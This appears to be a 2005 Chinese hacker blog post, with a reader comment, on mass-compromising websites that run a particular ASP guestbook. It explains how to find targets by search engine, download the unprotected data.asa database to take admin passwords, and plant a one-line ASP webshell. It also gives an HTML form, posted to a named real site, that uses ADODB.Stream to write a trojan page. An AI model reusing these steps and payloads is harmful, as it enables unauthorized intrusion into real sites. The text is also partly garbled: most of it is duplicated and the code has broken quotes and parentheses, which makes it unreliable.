2005-11-26 12:29:06 by: h4x0r
得到很多webshell
发现了了一个漏洞,严重!可以得到很多webshell.
他的原理使用data.asa未过滤,提交<%execute request("value"h4x0r"%>函数来获得上传页面!
==========================================================
我们现在baidu上search下:Windows XP 银色;ASP单用户版
这个留言本界面不错!不过他的数据库的路径如果自己不编个conn.asp,是改变不了的,而且它的数据库asa未做过滤,这就为我们提供入侵机会!
==========================================================
我们选择一个网站
然后用网际快车把data/data.asa下载下来
打开后把密码获取
登陆上去,在公告输入<%execute request("value"h4x0r"%>,然后保存!
==========================================================
在本地建立个提交文件[code]<form action=http://ehome.nbcom.net/jm/qq/data/data.asa method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream"
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin"
lP.SaveToFile server.mappath("men.asp",2
lP.Close
set lP=nothing
response.redirect "men.asp"
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>aaa/textarea><BR><center><br>
<input type=submit value=杀>
</code>
上传个木马,哈哈上来了
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=195
他的原理使用data.asa未过滤,提交<%execute request("value"h4x0r"%>函数来获得上传页面!
==========================================================
我们现在baidu上search下:Windows XP 银色;ASP单用户版
这个留言本界面不错!不过他的数据库的路径如果自己不编个conn.asp,是改变不了的,而且它的数据库asa未做过滤,这就为我们提供入侵机会!
==========================================================
我们选择一个网站
然后用网际快车把data/data.asa下载下来
打开后把密码获取
登陆上去,在公告输入<%execute request("value"h4x0r"%>,然后保存!
==========================================================
在本地建立个提交文件[code]<form action=http://ehome.nbcom.net/jm/qq/data/data.asa method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream"
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin"
lP.SaveToFile server.mappath("men.asp",2
lP.Close
set lP=nothing
response.redirect "men.asp"
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>aaa/textarea><BR><center><br>
<input type=submit value=杀>
</code>
上传个木马,哈哈上来了
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=195









不错哦,
一句马也差不多
--->
lP.writetext request("hackbin"
好象有点点不妥喔